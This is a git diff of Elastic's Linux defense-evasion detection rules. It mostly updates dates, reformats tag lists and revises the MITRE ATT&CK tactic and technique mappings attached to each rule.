b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml index bcb12bbfe9a..bb71c416c74 100644 --- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml +++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -139,3 +139,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml index c31d30624ef..46ad1a21591 100644 --- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml +++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -117,20 +124,21 @@ In Linux environments, system users are typically non-interactive and serve spec [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml index b3d9a7b222f..1ac5aa2f508 100644 --- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml +++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/04" [rule] author = ["Elastic"] @@ -126,30 +126,45 @@ sequence by host.id, process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" + [[rule.threat.technique]] + name = "Obfuscated Files or Information" + id = "T1027" + reference = "https://attack.mitre.org/techniques/T1027/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + name = "Deobfuscate/Decode Files or Information" + id = "T1140" + reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + [[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/linux/defense_evasion_journalctl_clear_logs.toml b/rules/linux/defense_evasion_journalctl_clear_logs.toml index aa909745f68..093b7354d19 100644 --- a/rules/linux/defense_evasion_journalctl_clear_logs.toml +++ b/rules/linux/defense_evasion_journalctl_clear_logs.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -117,6 +117,16 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml index 8a9075839fa..b2f955b40de 100644 --- a/rules/linux/defense_evasion_kernel_module_removal.toml +++ b/rules/linux/defense_evasion_kernel_module_removal.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -135,3 +135,21 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml index bc14d0952b7..68a5e17a6e7 100644 --- a/rules/linux/defense_evasion_kill_command_executed.toml +++ b/rules/linux/defense_evasion_kill_command_executed.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -103,20 +103,49 @@ process.name:(kill or pkill or killall) and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [[rule.threat.technique]] -id = "T1562" name = "Impair Defenses" +id = "T1562" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +name = "Indicator Blocking" +id = "T1562.006" +reference = "https://attack.mitre.org/techniques/T1562/006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml index bac0dbe6c01..847734d3990 100644 --- a/rules/linux/defense_evasion_kthreadd_masquerading.toml +++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -112,9 +112,14 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml index 5b6c4da06bc..3ac9270442c 100644 --- a/rules/linux/defense_evasion_ld_preload_cmdline.toml +++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -102,20 +111,57 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" + [[rule.threat.technique]] + name = "Hijack Execution Flow" + id = "T1574" + reference = "https://attack.mitre.org/techniques/T1574/" + + [[rule.threat.technique.subtechnique]] + name = "Dynamic Linker Hijacking" + id = "T1574.006" + reference = "https://attack.mitre.org/techniques/T1574/006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" + + [[rule.threat.technique]] + name = "Hijack Execution Flow" + id = "T1574" + reference = "https://attack.mitre.org/techniques/T1574/" + + [[rule.threat.technique.subtechnique]] + name = "Dynamic Linker Hijacking" + id = "T1574.006" + reference = "https://attack.mitre.org/techniques/T1574/006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Privilege Escalation" + id = "TA0004" + reference = "https://attack.mitre.org/tactics/TA0004/" + + [[rule.threat.technique]] + name = "Hijack Execution Flow" + id = "T1574" + reference = "https://attack.mitre.org/techniques/T1574/" + + [[rule.threat.technique.subtechnique]] + name = "Dynamic Linker Hijacking" + id = "T1574.006" + reference = "https://attack.mitre.org/techniques/T1574/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name", "process.command_line", "host.id"] diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml index fcf1c7d2429..8559b7e0144 100644 --- a/rules/linux/defense_evasion_ld_so_creation.toml +++ b/rules/linux/defense_evasion_ld_so_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -80,7 +80,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -108,6 +119,37 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml index 1f605570a16..14c9ecdfc1d 100644 --- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml +++ b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "eql" query = ''' sequence by process.parent.entity_id with maxspan=3s @@ -112,12 +120,45 @@ sequence by process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + name = "Obfuscated Files or Information" + id = "T1027" + reference = "https://attack.mitre.org/techniques/T1027/" + + [[rule.threat.technique]] + name = "Deobfuscate/Decode Files or Information" + id = "T1140" + reference = "https://attack.mitre.org/techniques/T1140/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + [[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml index 6be08ce102a..105dced6160 100644 --- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml +++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -91,7 +91,21 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,6 +134,11 @@ id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" @@ -129,11 +148,16 @@ reference = "https://attack.mitre.org/tactics/TA0005/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml index 6da26421c09..f68521c8f2e 100644 --- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml +++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -148,6 +148,11 @@ id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_potential_proot_exploits.toml b/rules/linux/defense_evasion_potential_proot_exploits.toml index ba241949298..1761b636315 100644 --- a/rules/linux/defense_evasion_potential_proot_exploits.toml +++ b/rules/linux/defense_evasion_potential_proot_exploits.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -89,7 +89,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -101,24 +111,11 @@ process.parent.name == "proot" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1211" +name = "Exploitation for Defense Evasion" +reference = "https://attack.mitre.org/techniques/T1211/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_prctl_process_name_tampering.toml b/rules/linux/defense_evasion_prctl_process_name_tampering.toml index 914dd6c4c6f..12d0ba4e5fe 100644 --- a/rules/linux/defense_evasion_prctl_process_name_tampering.toml +++ b/rules/linux/defense_evasion_prctl_process_name_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.011" -name = "Overwrite Process Arguments" -reference = "https://attack.mitre.org/techniques/T1036/011/" +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml index abe2549a743..42658fe2b44 100644 --- a/rules/linux/defense_evasion_rename_esxi_files.toml +++ b/rules/linux/defense_evasion_rename_esxi_files.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -103,21 +110,16 @@ VMware ESXi files are critical for virtual machine operations, storing configura framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[[rule.threat.technique]] -id = "T1491" -name = "Defacement" -reference = "https://attack.mitre.org/techniques/T1491/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1491.001" -name = "Internal Defacement" -reference = "https://attack.mitre.org/techniques/T1491/001/" +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_ssl_certificate_deletion.toml b/rules/linux/defense_evasion_ssl_certificate_deletion.toml index 2254deba1ee..d5ec0c2be7b 100644 --- a/rules/linux/defense_evasion_ssl_certificate_deletion.toml +++ b/rules/linux/defense_evasion_ssl_certificate_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -105,6 +105,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml index efc5b4ccb61..215cc1c7e9e 100644 --- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml +++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -84,9 +84,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml index b5156549894..33accceabc2 100644 --- a/rules/linux/defense_evasion_suspicious_path_mounted.toml +++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -114,11 +114,6 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml index daf5a725550..5f5aad743d2 100644 --- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml +++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -90,20 +90,26 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or / [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] + name = "Hijack Execution Flow" + id = "T1574" + reference = "https://attack.mitre.org/techniques/T1574/" + + [[rule.threat.technique]] + name = "Indirect Command Execution" + id = "T1202" + reference = "https://attack.mitre.org/techniques/T1202/" + + [[rule.threat.technique]] + name = "Hide Artifacts" + id = "T1564" + reference = "https://attack.mitre.org/techniques/T1564/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" 